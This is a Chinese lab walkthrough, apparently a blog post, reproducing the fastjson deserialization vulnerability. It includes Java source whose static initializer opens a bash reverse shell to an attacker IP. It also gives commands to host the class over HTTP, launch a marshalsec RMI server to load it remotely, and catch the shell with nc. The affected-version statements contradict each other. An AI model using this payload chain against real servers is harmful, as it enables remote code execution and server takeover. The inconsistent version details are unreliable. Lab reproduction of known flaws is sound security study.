一、漏洞特征
fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。即fastjson的主要功能就是将Java Bean序列化成JSON字符串,这样得到字符串之后就可以通过数据库等方式进行持久化了。
阿里巴巴公司开源Java开发组件Fastjson存在反序列化漏洞(CNVD-2022-40233)。攻击者可利用该漏洞实施任意文件写入、服务端请求伪造等攻击行为,造成服务器权限被窃取、敏感信息泄漏等严重影响。
影响版本:fastjson<=1.2.24
该漏洞影响fastjson 1.2.80及之前所有版本
访问http://192.168.232.131:8090/即可看到JSON格式的输出
修改用户信息发现有回显
二、漏洞复现
1.编译java文件
// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;
public class TouchFile {
static {
try {
Runtime rt = Runtime.getRuntime();
String[] commands = {"/bin/bash","-c","bash -i >& /dev/tcp/192.168.245.2/2333 0>&1"};
Process pc = rt.exec(commands);
pc.waitFor();
} catch (Exception e) {
// do nothing
}
}
}
Ip改成自己攻击机的ip
javac C:\Users\Administrator\Desktop\TouchFile.java
2.开启http服务
把编译好的class文件传到外网系统中,并在class文件所在的目录,Python起一个http服务
python -m http.server 4444
3.启动RMI服务
使用marshalsec项目,启动RMI服务,监听9999端口并加载远程类TouchFile.class
https://github.com/mbechler/marshalsec
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer “http://192.168.245.2:4444/#TouchFile” 9999
4.nc开启监听
另起一个终端开启监听(nc -lvnp 2333)
5.bp发送构造包
访问192.168.232.131:8090并用bp抓包,构造如下POST请求包
6.反弹shell
注意:如果反弹失败看是不是主机ip搞错了,kali的时间对不对
749
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
